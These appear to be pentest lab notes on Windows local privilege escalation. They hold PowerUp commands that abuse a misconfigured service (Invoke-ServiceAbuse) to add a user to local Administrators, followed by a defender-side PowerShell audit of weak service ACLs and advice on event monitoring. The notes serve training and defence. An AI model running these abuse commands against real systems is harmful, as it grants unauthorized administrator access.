Local privesc
Tools
- PowerUp: A PowerShell tool from the PowerTools suite designed to automate the identification of Windows misconfigurations that lead to Local Privilege Escalation (LPE).
- WinPEAS: An extremely deep enumeration tool (available as .exe or .bat) that searches for privilege escalation vectors, stored credentials, and active sessions using a color-coded priority system.
- Privesc: Short for "Privilege Escalation." The process of gaining higher-level permissions (e.g., Local Admin or SYSTEM) from a low-privileged user account.
# Dot-source PowerUp into the current PowerShell session so its functions are available
. C:\AD\Tools\PowerUp.ps1
# Run all automated checks to find service, file, and registry vulnerabilities
Invoke-AllChecks
# Abuse the identified service by changing its binPath to a command that elevates our user
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName 'dcorp\student544' -Verbose
# Check if 'student544' is now a member of the local Administrators group
net localgroup Administrators
# Log off to refresh the Access Token and activate the newly granted Administrator rights
logoff
# Cleanup: Remove the user from the Administrators group to restore original state (testing)
net localgroup Administrators dcorp\student544 /delete
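Invoke-ServiceAbuse only works because some service's security descriptor lets a low-privileged principal reconfigure it. The audit below is an added defender-side check, not part of these notes or of PowerUp: it reads each service's SDDL with sc.exe sdshow, parses it with the .NET RawSecurityDescriptor class, and reports any service where Everyone, Authenticated Users, BUILTIN\Users or INTERACTIVE holds SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or GENERIC_ALL. The function name Get-WeakServiceAcl and the variable names are my own; the access-mask constants are the documented winsvc.h values.

```powershell
# Added example (defender audit of weak service ACLs); not from the original notes or PowerUp.
# Run from an elevated prompt so sc.exe can read every service's security descriptor.

# Service access rights (winsvc.h) that allow changing binPath or rewriting the ACL itself
$ServiceChangeConfig = 0x00000002
$WriteDac            = 0x00040000
$WriteOwner          = 0x00080000
$GenericAll          = 0x10000000
$RiskyMask = $ServiceChangeConfig -bor $WriteDac -bor $WriteOwner -bor $GenericAll

# Well-known SIDs that every interactive or domain user is a member of
$LowPrivSids = @(
    'S-1-1-0',      # Everyone
    'S-1-5-11',     # Authenticated Users
    'S-1-5-32-545', # BUILTIN\Users
    'S-1-5-4'       # INTERACTIVE
)

function Get-WeakServiceAcl {
    [CmdletBinding()]
    param(
        # Defaults to every installed service; pass names to audit a subset
        [string[]]$Name = (Get-Service | Select-Object -ExpandProperty Name)
    )

    foreach ($svc in $Name) {
        # sc.exe sdshow prints a blank line followed by the SDDL string (D:(...)S:(...))
        $sddl = (& sc.exe sdshow $svc | Where-Object { $_ -match '^[DOGS]:' }) -join ''
        if (-not $sddl) { continue }   # access denied or no descriptor returned

        $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor $sddl
        foreach ($ace in $sd.DiscretionaryAcl) {
            # Only allow-ACEs matter; deny-ACEs reduce rights
            if ($ace.AceType -ne 'AccessAllowed') { continue }
            if ($LowPrivSids -notcontains $ace.SecurityIdentifier.Value) { continue }
            if (($ace.AccessMask -band $RiskyMask) -eq 0) { continue }

            $account = try {
                $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value
            } catch { $ace.SecurityIdentifier.Value }

            [pscustomobject]@{
                Service    = $svc
                Principal  = $account
                AccessMask = ('0x{0:X8}' -f $ace.AccessMask)
                BinPath    = (Get-CimInstance Win32_Service -Filter "Name='$svc'").PathName
            }
        }
    }
}

# Usage: list every service a standard user could reconfigure
Get-WeakServiceAcl | Format-Table -AutoSize
```

Any row this returns is a finding to fix with sc.exe sdset (or the vendor installer) rather than something to tolerate; after remediation, re-running Invoke-AllChecks against the host should no longer list the service. Monitoring Security event 4732 (member added to a security-enabled local group) catches the final step of the procedure above, the addition of a user to local Administrators, independently of which service was abused.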

